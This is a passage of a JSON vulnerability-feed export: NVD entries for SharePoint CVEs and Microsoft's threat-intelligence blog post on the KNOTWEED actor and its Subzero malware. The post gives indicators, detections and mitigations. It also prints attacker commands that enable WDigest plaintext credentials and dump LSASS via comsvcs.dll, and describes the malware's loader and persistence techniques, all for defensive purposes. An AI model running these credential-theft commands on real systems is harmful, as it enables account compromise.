"CVE-2021-26420", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26420", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31963", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-15T13:13:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_server:2016", "cpe:/a:microsoft:sharepoint_server:2013", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": "CVE-2021-31963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31963", "cvss": {"score": 
6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2013:sp1:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31963.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31966", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-14T21:02:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_server:2016", "cpe:/a:microsoft:sharepoint_server:2013", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": "CVE-2021-31966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31966", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, 
"cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2013:sp1:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}], "mmpc": [{"lastseen": "2022-07-27T17:42:56", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. 
In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services_ \u201cto multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information._\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities\u201d _and _\u201chighly sophisticated Red Teams to challenge your company's most critical assets.\u201d_ \n \nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. 
As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump _for the persistent loader and _Corelump _for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. 
Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.\n\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. 
Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\nFigure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\n Figure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. 
Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\nFigure 3: Copying opcodes Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\nFigure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. 
As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. 
Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [SharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential _to \u201c1\u201d to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub 
gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump _drops the_ Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\\\. 
_This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32 Default_ value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = "_%SystemRoot%\\System32\\ApplicationFrame.dll_"\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = "_%SystemRoot%\\system32\\propsys.dll_"\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = "_%SystemRoot%\\system32\\wbem\\wbemprox.dll_"\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = "_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_"\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = "_%SystemRoot%\\System32\\Actioncenter.dll_"\n\nMany of the post-compromise actions can be detected based on their command lines. 
Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, _and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature\u2014enabled by default\u2014is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. 
_Note:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware 
\nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool \nacrobatrelay[.]com__| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. 
These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking _- Detects multiple behaviors, including _JumpLump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module _- Detects a possible privilege escalation behavior associated with CVE-2022-22047; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities\n * _KNOTWEED actor activity detected _- Detects KNOTWEED actor activities\n * _WDigest configuration change _- Detects potential retrieval of clear text password from changes to _UseLogonCredential_ registry key\n * _Sensitive credential memory read _- Detects LSASS credential dumping via minidumps\n * _Suspicious Curl behavior _- Detects the use of Curl to download KNOTWEED tooling from public file shares\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data 
sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected ****credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to ****plaintext credentials**\n\nThis query looks for registry key being set to enabled plain text credentials\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their 
environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\ folder_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector 
offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mmpc", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-07-27T17:46:22", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple 
